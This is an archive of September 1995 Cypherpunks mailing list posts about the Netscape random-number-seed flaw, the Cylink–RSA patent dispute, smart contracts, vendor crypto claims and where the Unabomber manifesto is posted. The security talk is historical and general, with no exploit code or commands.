Message-ID: <Pine.D-G.3.91.950919135026.18165A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rev. Mark Grant wrote:

> On Sun, 17 Sep 1995, Brian Davis wrote:
> 
> > Phill obviously presents one point of view, vigorously and well.  What do 
> > the rest of you think about a teen who, say, busts into a .edu site, 
> > plays with the files, and ultimately brings the system down entirely for 
> > 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> > him?  Have a TLA hire him???
> 
> If it wasn't for ITAR the Net would already have secure encryption and
> authentication, and most such hacker attacks would be impossible (or at 
> least impractical).
> 
> 		Mark

The non-responsive answer is stricken from the record.  :-)
You mean "secure" as Netscape was secure from sameer et al.?

Apples and oranges answer to my perhaps-not-so-hypothetical question.  

Still waiting for a serious response ...

Brian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 19 Sep 95 11:03:34 PDT
To: cypherpunks@toad.com
Subject: unabomber paper
Message-ID: <199509191803.OAA15542@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



is available on

	 http://www.ai.mit.edu/misc/unabomber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Nielsen <nielsenc@upgrade.com>
Date: Tue, 19 Sep 95 11:18:41 PDT
To: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Subject: Re: Verification of Random Number Generators
In-Reply-To: <v02110102ac849090d9fe@[17.255.9.110]>
Message-ID: <199509191817.OAA05143@upgrade.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995 09:04:29 -0700  
"Erik E. Fair" wrote:
--------
>> 
>> Just an idle thought: it might be possible to do a probabalistic
>> verification of a RNG by sampling it over some number of samples, and
>> statistically analyzing the sample space. This would be analysis under the
>> model of "RNG as black box" as opposed to (or rather, if you're smart, in
>> addition to) code inspection & review. Any statisticians among us?
>> 
>> Erik Fair
>> 

But statistical tests of randomness alone do not make a good RNG.
At least, not for cryptographic use. A cryptographically secure
RNG is also unpredictable, i.e., computationally unfeasible to
predict the next random bit will be given the algorithm, and not
reliably reproduced, i.e., multiple runs with the exact same input
do not generate the same sequence.

-Chris

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Christopher Nielsen                               UCA&L
System and Network Administrator                  Buffalo, New York
(nielsenc@upgrade.com)                            #include <disclaimer.h>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 19 Sep 95 11:22:00 PDT
To: cypherpunks@toad.com
Subject: ASCII unabomber paper attribution and FTP address
Message-ID: <199509191821.OAA15570@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



N.B. unabomber paper is is via JYA_lbr.  Also available via FTP

	ftp://ftp.ai.mit.edu/users/misc/unabomber




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 19 Sep 95 15:00:48 PDT
To: cypherpunks@toad.com
Subject: Re: Cylink
Message-ID: <199509192138.OAA07353@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


> WSJ, Sept 19, 1995.
> 
> Cylink Claims Right To Key Technology Involving
> Encryption
> 
> ...
> 
> Sunnyvale, Calif. - A Silicon Valley company asserted a
> legal claim to a key technology for protecting electronic
> commerce, following an arbitration ruling.
> 
>                                  ... The arbitrators
> ruled that RSA hasn't had the right to sublicense the
> Stanford patents since 1990.
> 
> Cylink said it would seek royalties from companies that
> have licensed software code from RSA and are
> redistributing it, arguing that they are infringing the
> Stanford patents.
> 

This was reported in the San Jose Mercury News today,
as well.  They reported that Cylink licenses the patents
for $50,000.  I'm assuming that the main patent in question
is the Diffie-Hellmann patent (only 1 year and 7 months to
DH Freedom Day!).  Since PKP (and Bidzos, now president of
RSA) always said that DH covered all public key encryption,
it would seem that any RSA licensee would also need a license
from Cylink.

The Merc article said that RSA's and Cylink's interpretation
of the arbitrators' ruling were completely opposite.  I haven't
seen a copy of the ruling.  The Merc says that "Outside observers
tend to take RSA's view of things."

I'm stunned that an arbitrator could make a uniterpretable ruling
on something so cut and dried, but then, IANAL.

I've called both PKP and RSA, I haven't been able to talk to anybody
about it yet.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel C. Cotey" <dccotey@eclat.uccs.edu>
Date: Tue, 19 Sep 95 13:50:03 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
Message-ID: <Pine.ULT.3.91.950919143844.5998B-100000@eclat>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Rev. Mark Grant wrote:

>
> If it wasn't for ITAR the Net would already have secure encryption and
> authentication, and most such hacker attacks would be impossible (or at 
> least impractical).
> 

	As someone who has hacked a little I would say that sloppy coding 
(much like netscape's) has helped hackers far more than lack of 
encryption.  Imagine for a moment if sun had included some form of 
encryption (maybe in nfs ?) in sunos 4.x.x,  would it have been 
effective if it had as many holes as sendmail, etc.. ?

	Good algorithms well coded will hurt hackers. Good algorithms 
slopply coded will simply provide hackers with one more toy to abuse, 
while giving average people a false since of security (but you SAID it 
was strong crypto, so why did they get my credit card number ?)


 pUFF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 11:56:10 PDT
To: clav@deltanet.com (David Clavadetscher)
Subject: Encryption algorithms used in PrivaSoft
In-Reply-To: <9509191826.AA19743@server1.deltanet.com>
Message-ID: <9509191855.AA04334@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dear PrivaSoft-

Your Web page, "What is PrivaSoft ?" 
(http://www.megasoft.com/privasoft/about.html) says:

> How does it work? 
>
> PrivaSoft scrambles and descrambles an image of the document using Bitmap 
> encryption. When scrambling, PrivaSoft divides the document into tiny tiles
> and shuffles them pseudo-randomly using your secret key as part of the
> encryption algorithm.

This is an extremely general description of encryption and decryption. I am
interested in learning more about the cryptographic algorithms used in the
PrivaSoft product. Where should I look for further details ?  Are there
technical contacts within your organization who would be willing to discuss
this in email ?  References would be greatly appreciated.

Sincerely
-L. McCarthy <lmccarth@cs.umass.edu>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 19 Sep 95 13:06:26 PDT
To: cypherpunks@toad.com
Subject: netscape broken on NPR
Message-ID: <01HVGQF85HCY00038M@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


NPR reported on the security flaw in Netscape,

3:05 pm CDT.	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 12:10:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ASCII unabomber paper attribution and FTP address
In-Reply-To: <199509191821.OAA15570@grape-nuts.ai.mit.edu>
Message-ID: <9509191910.AA04919@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Lethin writes:
> N.B. unabomber paper is is via JYA_lbr.  Also available via FTP
> 
> 	ftp://ftp.ai.mit.edu/users/misc/unabomber

Actually it's:

	ftp://ftp.ai.mit.edu/pub/users/misc/unabomber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Tue, 19 Sep 95 12:29:35 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <9509191929.AA15153@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Confirming suspicions that PrivaSoft is a security-through-obscurity outfit:

> From: David Clavadetscher <clav@deltanet.com>
> Subject: Re: Encryption algorithms used in PrivaSoft
> 
> Dear L.,
> 
> At this time our crypto engine is patented and proprietary. If you tell me
> the intent of your interest I will see what other information we can provide
> to you. Call me if you like.
[...]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Williams <bobw@netmanage.com>
Date: Tue, 19 Sep 95 15:45:11 PDT
To: cypherpunks@toad.com
Subject: NetManage - Cylink Press Announcement
Message-ID: <Chameleon.950919154529.bobw@BobwTest.netmanage.com>
MIME-Version: 1.0
Content-Type: text/plain


There are quite a few open issues regarding 
the reliability, interoperability, and licensing of
public key technology. 

All parties interested in access to code for testing and
comment please respond to this email address.  

Thanks

Bob
------------

NETMANAGE, Inc.
Press Release
FOR IMMEDIATE RELEASE

Contact: Donna Loughlin, NetManage, (408) 973-7171
         Donna@netmanage.com

NetManage Licenses Public Key Cryptography from CYLINK

The Two Firms to Promote an Open Interface for Internet Security which 
Corrects Flaws and Eliminates Financial and Interoperability Barriers for 
Cryptography.

Cupertino, California - September 19,  1995- NetManage, the leader in TCP/IP 

Applications for Windows and Internet productivity software, announced today 
that is has signed a licensing agreement with CYLINK Corporation for 
technology which incorporates the fundamental patents covering public 
key cryptography.   NetManage will be providing support for public key 
authentication and data encryption as a fundamental component of its 
Chameleon Enterprise strategy.  The two firms further announced that they 
plan to provide support for an open interface for Internet security which 
will address recent flaws found in cryptographic implementations used by 
Netscape Communications and other unpublicized security holes in existing 
Internet security protocols. The standard is further intended to eliminate 
the financial and interoperability barriers that have been holding back 
widespread use of public key cryptography on the Internet.

In a separate announcement released yesterday, CYLINK announced that it had 
prevailed in a patent lawsuit with RSA Data Security which found that RSA 
had infringed U.S. patents held by CYLINK which cover all known 
implementations of public key technology.

About Internet Security
----------------------- 
Establishing a secure Internet connection requires any computer software 
program to perform two functions: Authentication of the user, and bulk 
encryption of data.  

The Authentication phase allows two computers to verify that each party is 
who they claim to be, and that they are authorized to enter into a secure 
communications session.   This is done via 'public key' technology, which 
was developed and patented originally by Stanford University and licensed 
exclusively by CYLINK Corporation.

During the authentication phase the two computers also agree upon the 
encryption method to be used for bulk data transfer during the time the two 
computers are communicating data between one another.  These ciphers can be 
implemented in either software or hardware, including PCMCIA cards.  Popular 
encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and 
RC-4 and are available from a variety of software and hardware vendors.

Limitations of Current Internet Security Standards
--------------------------------------------------
Current implementations of security protocols proposed as standards by 
Netscape Communications and RSA Data Security, Inc. include security flaws 
and fail to fully accommodate open and interoperable secure communications 
between computers which use different bulk encryption ciphers.  These 
problems have limited the adoption of Internet security as a widespread 
interoperable feature of all Internet software and hardware products 
including end-user applications, servers, firewalls, and secure routers.

NetManage and CYLINK, along with other major software and hardware 
developers, will be announcing next week the release of a publicly available 
security implementation which allows for 'plug & play' interoperability for 
users of Internet security, and the endorsement of protocol extensions which 
improve the reliability of current proposed Internet security standards.  
This open implementation will not lock software or hardware developers into 
the use of encryption technology from any one vendor.

Related APIs, key exchange technology, and encryption will be made publicly 
available to other software and hardware developers.   Licensing will 
include source code and no per-copy royalty fees.

About NetManage
---------------
NetManage Inc., the fastest growing software company in the United States, 
develops markets and supports an integrated set of Internet-based 
applications, servers and development tools for Microsoft Windows, Windows 
95 and Windows NT.  NetManage software allows corporations to facilitate 
communication, sharing of information and collaboration between workgroups 
using Internet technology. The company's award winning products include 
Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose 
shares are traded on the NASDAQ under the ticker symbol NETM.  Its products 
are sold world-wide by NetManage's direct sales force and authorized channel 
partners.

About CYLINK
------------
CYLINK Corporation is the world's largest provider of enterprise-wide 
network information security products and wireless communications.  CYLINK 
is the exclusive holder of the fundamental patents which broadly claim the 
invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and 
Helman-Pohling) and which were originally developed at Stanford University.  
Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, 
financial institutions and government agencies.  Licensees of CYLINK 
technology include CISCO Systems, and other prominent hardware and software 
developers.

# # #








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:38:35 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950919153502.8469C-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Perry E. Metzger wrote:

> Not, of course, that they disclosed it before -- it was found by
> reverse engineering the distributed executable. Not, of course, that
> they have a choice in the matter of whether to disclose it -- they
> will be "disclosing" how its done as soon as they release the
> code. Not, of course, that security through obscurity does any good --
> it just magnifies the pain.

Well, now that Cypherpunks have again shown yet another hole in Netscape 
security, I think we are one pretty good standing to demand

   ACCESS TO SOURCE CODE FOR NETSCAPE,

so we can work to help make Netscape "pretty good".  Any reporters 
listening?  

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 19 Sep 95 12:50:49 PDT
To: cypherpunks@toad.com
Subject: Re: Caribbean Internet Services? (yes!)
In-Reply-To: <Pine.3.89.9509191530.B3082-0100000@offshore.com.ai>
Message-ID: <Pine.3.89.9509191523.A3155-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




> Perry E. Metzger
> Timothy C. May writes:
> > Power in St. Thomas may not be back for a year in some parts. The roads,
> > sewers, power lines, phone system, etc. will likely have to be completely
> > rebuilt.
> [...]
> > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than
> > they were a few months ago.
> 
> Not really. I suspect that phone company co-location and using buried
> lines and your own generator would probably fix most problems if you
> were "serious" about doing such a thing.

We are not so bad off down here.  Anguilla took a direct hit from Luis. 
Some of us have had to move computers into town for a week or two, but
that is really it.  Also, it has meant a couple weeks where we did not get
as much done, but not months of setback.  There is power and phone in
town, cell phones work (give me a ring at (809) 497-7255), generators are
not that expensive (like $600 for 5 kw). 

The utility polls have almost all been straightened or replaced already (2
weeks).  The high-tension lines have already been strung to many places
(like near my house).  Anguilla should be rewired within another 6 weeks
(we had the HMS South Hampton here for the last 2 weeks and now have 100
Royal Engineers helping out). 

Nobody was killed here.  We all have our own cisterns so we have water,
just bucket powered.  The places that were hit hard were poor areas that
some of the islands have, and people on boats.  Also, some other islands
will have water problems (not Anguilla).

   --  Vince Cate
       From Anguilla - A tax-haven in the Caribbean
                  (or as they like to say, a "Zero tax jurisdiction")
       http://www.offshore.com.ai/anguilla
       http://www.aibs.com.ai/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:44:12 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA and Netscape Crack (Re: NYT on Netscape Crack)
In-Reply-To: <ac8391c012021004b6fc@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950919154226.8469D-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Timothy C. May wrote:

> If the "flaws" are being found by our group, as John notes, just what is
> the NSA doing in the _second_ role it is supposed to have, it's "COMSEC,"
> or communications security, role?

Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow 
mechanisms ;)

"I'm from the NSA, I'm here to help your crypto..."

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 12:46:05 PDT
To: Sal Denaro <Sal@panix.com>
Subject: Re: AOL monitoring
In-Reply-To: <+3OXwAgbBgzR084yn@panix.com>
Message-ID: <Pine.SUN.3.91.950919154430.8469E-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995, Sal Denaro wrote:

> 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600

Hmmm...potential new crypto product...a "secure" newsreader with encrypted
.newsrc? 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 16:09:49 PDT
To: cypherpunks@toad.com
Subject: netscape's response
Message-ID: <199509192304.QAA05546@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


" With this knowledge, an experienced computer programmer could
decrypt messages sent by Netscape Navigator to other computers in a
few hours of computation time."

	Excuse me? A few hours? Try 25 seconds??

"Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before
it is sent to customers."

	A group which offered to review the first version, but
Netscape refused.

	From their release it looks like they aren't finding a better
source of entropy, but just using *more* sources of entropy. Doesn't
mean that the entropy is good.
	A T-shirt to the first person to decompile the new Seed code
and post the sources of "entropy" used.

	(See http://www.c2.org/hacknetscape for general [not written
in stone] guidelines regarding t-shirt awards)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 13:09:56 PDT
To: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509191438.AA16172@toad.com>
Message-ID: <Pine.SUN.3.91.950919160626.8469G-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Eli Brandt wrote:

> It sounds as if Netscape thinks that public knowledge of the key
> generation is part of the problem.  I hope somebody on the security
> team convinces management that entropy is more important than publicity.

No matter what they say in the press, I doubt it will take more than a few
weeks to reverse engineer the new RNG seeder and figure out where the data
comes from. 

I am hoping it was more of a PR thing than a technical thing.  I hope 
that Netscape tells us their RNG seed so Cyperhpunks don't have to go to all 
the trouble.  If they tell us, we can let them know if it is a reasonable 
mechanism or bogus.

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Tue, 19 Sep 95 13:24:15 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Investing on Information We Get Here
In-Reply-To: <ac843ff11a021004a43e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950919161828.8469I-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:

> P.S. On Netscape, I've finally decided to do some buying. Sure, this latest
> flaw is another embarrassment. But more deals and link-ups than ever are
> being inked, and they've got the resources to really spruce up Navigator
> and related products. I just don't see too many competitors on the horizon.

Let's not forget that Netscape is the biggest and best boon to the 
internet I've ever seen.  It is selling more bandwith, servers, and 
dial-up IP than anything that has come down the road.  It is enabling 
people to put even more info on the net, and I love it!

Of course, that is why it was targetted for the 40-bit RC4 crack, its 
immense popularity.  The total bogosity of 40-bit keys is now pretty 
apparent, and it is helping moves to 64-bit export, and perhaps beyond.

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Tue, 19 Sep 95 17:11:55 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto + Economics + AI = Digital Money Economies
In-Reply-To: <v02120d05ac81b6f9f6a9@[199.0.65.105]>
Message-ID: <199509192326.QAA12334@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I wholeheartedly agree with Tim that economics should play an important
role in analyzing cryptographic protocols.  It lets us step back and
ask what features are important, and in general what we are trying to
accomplish: usually something very different than the military uses of
cryptography that have given rise to the current methodologies.
To economics, especially game theory, I add a vast body of knowledge 
about human relationships, especially those involving commerce, that 
civilization has accumulated over the years: law, especially business law.

If we step back and look at what many cypherpunks are trying to achieve,
a major idealistic theme is a Ghandian cyberspace where 
violence can only be make-believe, whether in Mortal Komat or 
"flame wars".  Cypherpunks want our telephone networks, Internet businesses,
etc. to be both protected from force, and not dependent on force for
their existence. Our 20th century information commerce systems, from 
publishing to credit cards, have often been very dependent on the threat 
of violence, usually law enforcement, to protect intellectual property 
rights, deter fraud, collect debts, etc.  There is no utopia in sight where 
such threats can be completely eliminated, but we can recognize that they 
exist and carefully work to reduce our dependence on them.

In a far more practical vein, the dawn of international commercial
networks that criss-cross hundreds of jurisdictions with complex, obscure,
and often contradictory regulations, gives rise to a vast market
opportunity for substituting, where possible, network security mechanisms 
for law enforcement dependencies. The recent discoveries in 
cryptographic protocols provide us with a rich toolbox for
solving these problems.

Perhaps the most fundamental building block of business law is the
contract.   Strongly related to Tim's ontology of money is an 
area I have developed quite extensively called _smart contracts_.
The terms of contractual relationships can often be formalized
and standardized, and then performed via network-based protocols.  
These protocols, along with economic incentives, protect the performance of 
the contract from both fraud by the principals and attack from third 
parties.  This is also the basic task of law enforcement in commercial law;
thus smart contracts when successful reduce dependence on law enforcement
as well as losses to fraud and cracking.  Of special interest to 
cryptologists is that the principles of contract provide us with a 
methodology for the use of cryptography that is very different from,
and potentially far more lucrative than, the traditional military paradigm.

I have much more to say about these things in my essays under
http://www.digicash.com/~nick/, and in a forthcoming article
for _Extropy_.

Nick Szabo				szabo@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 19 Sep 95 07:32:20 PDT
To: cypherpunks@toad.com
Subject: (Yet Another?) Netscape Crack Web page
Message-ID: <9509191431.AA23188@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I've been waiting to see here an annoucement of some web page toward
which direct ppl that want more infos on the great (congrats) job
 from Ian and David, but as I saw none (maybe it's on its way, delay
seem pretty high those days on the list mail, in that case, sorry...)
and someone asked me more infos, on my sources,... I've set up a small
web pages with some infos collected here on

  http://hplyot.obspm.fr/~dl/netscapesec/

It includes few remote pointers, a copy of the original ian's post,
the NYT article, the Wall Street journal one, and... the source file
that I received from an european source (and incidently a summary from
me in french)

Please send me comments , corrections, additional pointers,... (it is
not meant to ne exhaustive anyway)

Best regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 19 Sep 95 14:40:09 PDT
To: cypherpunks@toad.com
Subject: Netscape responds.
Message-ID: <9509192139.AA21854@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Netscape now has an article on their home page about the 
latest break in their security.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 19 Sep 95 14:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: ASCII unabomber paper attribution and FTP address (fwd)
Message-ID: <199509192140.QAA02210@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: lmccarth@cs.umass.edu (L. McCarthy)
> Subject: Re: ASCII unabomber paper attribution and FTP address
> Date: Tue, 19 Sep 1995 15:10:48 -0400 (EDT)
> 
> Actually it's:
> 
> 	ftp://ftp.ai.mit.edu/pub/users/misc/unabomber
> 
> 


It isn't as of 4:28 Central...:(

Anyone got a clue as to where it has flow to?

                                               Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Tue, 19 Sep 95 16:36:28 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Unabomber ?
In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.950919164123.18472A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, John Young wrote:

> I'm scanning it now and will offer it in a while -- it's a 
> long, long pole.
> 
> 
> I'll ask by this post if someone wants to offer it FTP, I can 
> only do multiple e-mail bites from this hole.

I'm willing to put it on my home page


--
Syed Yusuf <yusuf921@uidaho.edu> |   http://www.uidaho.edu/~yusuf921 
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, 
and Greatness that does not bow before Children
                                                 --Kalil Gibran





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 15:10:11 PDT
To: cypherpunks@toad.com
Subject: Re: Cylink
Message-ID: <9509192145.AA01100@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


anonymous claims the WSJ said:
>  The arbitrators ruled that RSA hasn't had the right to sublicense
>  the Stanford patents since 1990.
>
>  Cylink said it would seek royalties from companies that have licensed
>  software code from RSA and are redistributing it, arguing that they
>  are infringing the Stanford patents.

hahahaha, this is funny if it's true...  Anyone know which two patents they  
are referring to? (diffie-hellman and merkle-hellman?)

Any ideas on how this will change the legal status of RSAREF and PGP?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 17:07:59 PDT
To: cypherpunks@toad.com
Subject: http://www.c2.org/hacknetscape/critique.phtml
Message-ID: <199509200002.RAA10459@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My response to netscape's press release.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 14:10:50 PDT
To: cypherpunks@toad.com
Subject: SUP_con
Message-ID: <199509192103.RAA01374@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-19-95. WashRag:


   "U.S. Agencies at Odds On Computer Exports."

      The State, Commerce and Defense departments are pushing
      for a loosening of federal controls on the export of
      U.S. supercomputers to all but a few developing nations,
      a move that would put extraordinary computing power into
      the hands of governments that have long been denied it.
      The proposal also has collected strong support from the
      computer industry but has provoked criticism from the
      Energy Department and the Arms Control and Disarmament
      Agency. Advocates of the plan want President Clinton to
      announce the new, weaker export limits during a proposed
      visit to a computer factory in California's Silicon
      Valley on Thursday. [No crypto mentioned.]


   "French Nuclear Program Closely Tied to U.S. Sharing of
   Sensitive Codes, Access to California Labs to Expand."

      Despite its claims of developing an independent nuclear
      deterrent, France has long relied on the U.S. for some
      of the most sophisticated technologies needed to upgrade
      and maintain a modern nuclear arsenal. Although known to
      specialists, the U.S.-French nuclear links have been
      little discussed over the years. Officials are currently
      are trying to negotiate an arrangement under which the
      two sides will begin to share sensitive computer codes
      that describe how bombs behave when they are detonated.
      France needs the data to make full use of access to two
      sophisticated new U.S. nuclear weapons research
      facilities that Washington has quietly offered French
      weapons experts.


   Deux: SUP_con  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Tue, 19 Sep 95 14:12:16 PDT
To: cypherpunks@toad.com
Subject: Cylink
Message-ID: <199509192112.RAA10595@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


WSJ, Sept 19, 1995.

Cylink Claims Right To Key Technology Involving
Encryption


Sunnyvale, Calif. - A Silicon Valley company asserted a
legal claim to a key technology for protecting electronic
commerce, following an arbitration ruling.

Closely held Cylink Corp. said the ruling gave back to
the company control over two key Stanford University
patents regarding public-key encryption, a technique for
scrambling data from theft or eavesdropping. A panel of
three arbitrators, asked to settle a dispute between
Cylink and RSA Data Security Inc., dissolved a five-year
partnership between the two that pooled their encryption
patents.

RSA, a closely held company based in Redwood City,
Calif., is the dominant supplier of encryption software,
with users that include Microsoft Corp., Novell Inc.,
Netscape Communications Corp., Apple Computer Inc. and
International Business Machines Corp. The arbitrators
ruled that RSA hasn't had the right to sublicense the
Stanford patents since 1990.

Cylink said it would seek royalties from companies that
have licensed software code from RSA and are
redistributing it, arguing that they are infringing the
Stanford patents.

-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Sep 95 14:16:58 PDT
To: www-buyinfo@allegra.att.com
Subject: Financial Services Technology Consortium
Message-ID: <v02120d0dac84e026ebdb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


A friend found this...

Cheers,
Bob Hettinga

--- begin forwarded text
Bob:

  I was looking for a web site for Shawmut/Fleet Bank and could
not find one.  But I did come across this which I thought might
be of particular interest to you...

            http://www.llnl.gov/fstc/index.html

It is the Financial Services Technology Consortium (FSTC), which is a
consortium of financial services providers, national laboratories,
universities, and government agencies who sponsor and participate in
non-competitive collaborative research and development on interbank
technical projects.

Cheers,
Will


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
